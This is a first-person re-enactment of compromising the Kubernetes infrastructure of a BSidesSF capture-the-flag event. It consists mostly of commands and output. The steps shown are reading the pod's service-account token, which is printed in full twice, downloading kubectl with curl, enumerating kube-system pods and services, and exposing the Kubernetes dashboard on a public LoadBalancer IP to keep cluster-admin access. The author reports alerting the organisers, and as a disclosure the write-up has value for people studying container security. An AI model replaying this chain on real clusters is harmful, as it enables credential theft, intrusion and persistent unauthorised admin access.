renactment of BSidesSF CTF infra own
This is a rough re-enactment of the steps that were carried out.
Once basic remote execution was established I constructed a pseudo-shell by using a filesystem watcher.
command = ['id']
uid=1001(worker) gid=0(root) groups=0(root)
We have basic shell execution, let's start exploring a bit.
command = ['which', 'curl']
/usr/bin/curl
ok cool we have some tools
command = ['cat', '/etc/hosts']
# Kubernetes-managed hosts file.
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
fe00::0 ip6-mcastprefix
fe00::1 ip6-allnodes
fe00::2 ip6-allrouters
10.0.2.16 zumbo-609050369-nsz0m
Kubernetes huh..
command = ['sh', '-c', 'mount']
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,relatime,mode=755)
cgroup on /sys/fs/cgroup/cpuset type cgroup (ro,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu type cgroup (ro,nosuid,nodev,noexec,relatime,cpu)
cgroup on /sys/fs/cgroup/cpuacct type cgroup (ro,nosuid,nodev,noexec,relatime,cpuacct)
cgroup on /sys/fs/cgroup/blkio type cgroup (ro,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/memory type cgroup (ro,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (ro,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls type cgroup (ro,nosuid,nodev,noexec,relatime,net_cls)
cgroup on /sys/fs/cgroup/perf_event type cgroup (ro,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/net_prio type cgroup (ro,nosuid,nodev,noexec,relatime,net_prio)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (ro,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/pids type cgroup (ro,nosuid,nodev,noexec,relatime,pids)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,data=ordered)
tmpfs on /run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime,data=ordered)
/dev/sda1 on /etc/hostname type ext4 (rw,relatime,data=ordered)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,mode=755)
tmpfs on /proc/timer_stats type tmpfs (rw,nosuid,mode=755)
ohlala: /run/secrets/kubernetes.io/serviceaccount
command = ['sh', '-c', 'ls -al /run/secrets/kubernetes.io/serviceaccount']
drwxrwxrwt 3 root root 140 Mar 30 02:11 .
drwxr-xr-x 3 root root 4096 Mar 30 02:11 ..
drwxr-xr-x 2 root root 100 Mar 30 02:11 ..3983_30_03_02_11_15.354325550
lrwxrwxrwx 1 root root 31 Mar 30 02:11 ..data -> ..3983_30_03_02_11_15.354325550
lrwxrwxrwx 1 root root 13 Mar 30 02:11 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Mar 30 02:11 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Mar 30 02:11 token -> ..data/token
command = ['sh', '-c', 'cat /run/secrets/kubernetes.io/serviceaccount/token']
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZmF1bHQtdG9rZW4tMGJka3AiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6ImVhYmVhMzVkLWYxNTUtMTFlNi04MWQ5LWVhYjJlOTBkZjJjMCIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.Mc2xGFHzUgAktvckobBnawRCq7shrhD8KAHitCsfbWscpEwZaWAS6GhYL2t_MAVT6cK4P1OMv8_bqX_lE0A2wT_O0BJC_vw_Y80ZJgrUPodfZ65pkBRwNn6WUV9BH-LWDHIPJ48NT3gFcwgaP-h8RX1WCa_-b6ORTKPfZ0UMn62G2fEyZevNbds25aqhu54LREy7sLh8KJEmUw4bNnJB66lNJntwRQFPohkCWjpedT8fT-KKFsqhYLTGBFSQo9S3N50uMrxQkdY7zpt1yRBIrUOArtCETEoFSblQSpX2n2i_K-F71v5FLpcsTgRVoKUpFtOdVk9EeTXY0lmtq0zgRQ
```j
Wonderful, looks like a jwt.
#
```python
command = 'curl -Lo /tmp/k https://storage.googleapis.com/kubernetes-release/release/v1.5.3/bin/linux/amd64/kubectl'.split(' ')
rule of silence. golden.
command = ['sh', '-c', 'ls -alh /tmp']
drwxrwxrwt 2 root root 4.0K Mar 30 02:57 .
drwxr-xr-x 61 root root 4.0K Mar 30 02:33 ..
-rw-r--r-- 1 worker root 49M Mar 30 02:57 k
zumbo runs with 4 replicas so some of these were repeated to ensure every pod was targetted. This re-running is omitted for brevity.
command = ['sh', '-c', 'chmod +x /tmp/k; /tmp/k']
kubectl controls the Kubernetes cluster manager.
Find more information at https://github.com/kubernetes/kubernetes.
Basic Commands (Beginner):
create Create a resource by filename or stdin
expose Take a replication controller, service, deployment or pod and expose it as a new Kubernetes Service
run Run a particular image on the cluster
set Set specific features on objects
Basic Commands (Intermediate):
get Display one or many resources
explain Documentation of resources
edit Edit a resource on the server
delete Delete resources by filenames, stdin, resources and names, or by resources and label selector
Deploy Commands:
rollout Manage a deployment rollout
rolling-update Perform a rolling update of the given ReplicationController
scale Set a new size for a Deployment, ReplicaSet, Replication Controller, or Job
autoscale Auto-scale a Deployment, ReplicaSet, or ReplicationController
Cluster Management Commands:
certificate Modify certificate resources.
cluster-info Display cluster info
top Display Resource (CPU/Memory/Storage) usage
cordon Mark node as unschedulable
uncordon Mark node as schedulable
drain Drain node in preparation for maintenance
taint Update the taints on one or more nodes
Troubleshooting and Debugging Commands:
describe Show details of a specific resource or group of resources
logs Print the logs for a container in a pod
attach Attach to a running container
exec Execute a command in a container
port-forward Forward one or more local ports to a pod
proxy Run a proxy to the Kubernetes API server
cp Copy files and directories to and from containers.
Advanced Commands:
apply Apply a configuration to a resource by filename or stdin
patch Update field(s) of a resource using strategic merge patch
replace Replace a resource by filename or stdin
convert Convert config files between different API versions
Settings Commands:
label Update the labels on a resource
annotate Update the annotations on a resource
completion Output shell completion code for the given shell (bash or zsh)
Other Commands:
api-versions Print the supported API versions on the server, in the form of "group/version"
config Modify kubeconfig files
help Help about any command
version Print the client and server version information
Use "kubectl <command> --help" for more information about a given command.
Use "kubectl options" for a list of global command-line options (applies to all commands).
we now are execing the kubernetes cli inside the pods
command = ['sh', '-c', 'chmod +x /tmp/k; /tmp/k get ns']
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
This took a bit to get around but simply setting KUBECONFIG let's us move forward.
command = ['sh', '-c', 'chmod +x /tmp/k; touch /tmp/c; KUBECONFIG=/tmp/c /tmp/k get ns']
default Active 45d
kube-system Active 45d
Originally i went through set-credentials like so but it turns out that's not even necessary. It turns out that kubectl stats the serviceaccount token:
stat("/var/run/secrets/kubernetes.io/serviceaccount/token", {st_mode=S_IFREG|0644, st_size=846, ...}) = 0
#command = ['sh', '-c', 'chmod +x /tmp/k; touch /tmp/c; KUBECONFIG=/tmp/c /tmp/k config set-credentials foo --token=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZmF1bHQtdG9rZW4tMGJka3AiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6ImVhYmVhMzVkLWYxNTUtMTFlNi04MWQ5LWVhYjJlOTBkZjJjMCIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.Mc2xGFHzUgAktvckobBnawRCq7shrhD8KAHitCsfbWscpEwZaWAS6GhYL2t_MAVT6cK4P1OMv8_bqX_lE0A2wT_O0BJC_vw_Y80ZJgrUPodfZ65pkBRwNn6WUV9BH-LWDHIPJ48NT3gFcwgaP-h8RX1WCa_-b6ORTKPfZ0UMn62G2fEyZevNbds25aqhu54LREy7sLh8KJEmUw4bNnJB66lNJntwRQFPohkCWjpedT8fT-KKFsqhYLTGBFSQo9S3N50uMrxQkdY7zpt1yRBIrUOArtCETEoFSblQSpX2n2i_K-F71v5FLpcsTgRVoKUpFtOdVk9EeTXY0lmtq0zgRQ; KUBECONFIG=/tmp/c /tmp/k get ns']
command = ['sh', '-c', 'KUBECONFIG=/tmp/c /tmp/k --namespace=kube-system get po']
NAME READY STATUS RESTARTS AGE
fluentd-cloud-logging-gke-cluster-1-default-pool-f674663f-hlfq 1/1 Running 0 22h
fluentd-cloud-logging-gke-cluster-1-pool-1-c18e5b97-pfj3 1/1 Running 0 6m
fluentd-cloud-logging-gke-cluster-1-pool-1-c18e5b97-vnsv 1/1 Running 0 6m
heapster-v1.2.0.1-1382115970-6t6t4 2/2 Running 0 21h
kube-dns-4101612645-1p6l3 4/4 Running 0 22h
kube-dns-autoscaler-2715466192-nwh5j 1/1 Running 0 22h
kube-proxy-gke-cluster-1-default-pool-f674663f-hlfq 1/1 Running 0 22h
kube-proxy-gke-cluster-1-pool-1-c18e5b97-pfj3 1/1 Running 0 7m
kube-proxy-gke-cluster-1-pool-1-c18e5b97-vnsv 1/1 Running 0 7m
kubernetes-dashboard-3543765157-88p5s 1/1 Running 0 22h
l7-default-backend-2234341178-rs38c 1/1 Running 0 22h
beautiful, let's continue.
command = ['sh', '-c', 'KUBECONFIG=/tmp/c /tmp/k --namespace=kube-system get svc']
NAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE
default-http-backend 10.3.242.234 <nodes> 80:30564/TCP 22h
heapster 10.3.252.64 <none> 80/TCP 22h
kube-dns 10.3.240.10 <none> 53/UDP,53/TCP 22h
kubernetes-dashboard 10.3.241.52 <none> 80/TCP 22h
Let's punch open a hole and gain persistence through other means.
command = ['sh', '-c', 'KUBECONFIG=/tmp/c /tmp/k --namespace=kube-system expose deployment kubernetes-dashboard --name=kpub --type=LoadBalancer']
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
Hm, 500..
command = ['sh', '-c', 'KUBECONFIG=/tmp/c /tmp/k --namespace=kube-system get svc']
NAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE
default-http-backend 10.3.242.234 <nodes> 80:30564/TCP 22h
heapster 10.3.252.64 <none> 80/TCP 22h
kpub 10.3.252.201 <pending> 9090:31487/TCP 17s
kube-dns 10.3.240.10 <none> 53/UDP,53/TCP 22h
kubernetes-dashboard 10.3.241.52 <none> 80/TCP 22h
\o/ pending - I can already tell this cluster is running in GKE but as long as it's in an environment that allows type=LoadBalancer service provisioning we can open up other inroads.
command = ['sh', '-c', 'KUBECONFIG=/tmp/c /tmp/k --namespace=kube-system get svc']
NAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE
default-http-backend 10.3.242.234 <nodes> 80:30564/TCP 22h
heapster 10.3.252.64 <none> 80/TCP 22h
kpub 10.3.252.201 104.199.126.106 9090:31487/TCP 59s
kube-dns 10.3.240.10 <none> 53/UDP,53/TCP 22h
kubernetes-dashboard 10.3.241.52 <none> 80/TCP 22h
Now http://104.199.126.106:9090/ is publically reachable.
From here I started and ran, and exposed containers to allow me to keep cluster admin access I also alerted the organizers and avoided spoiling the fun.
-tmc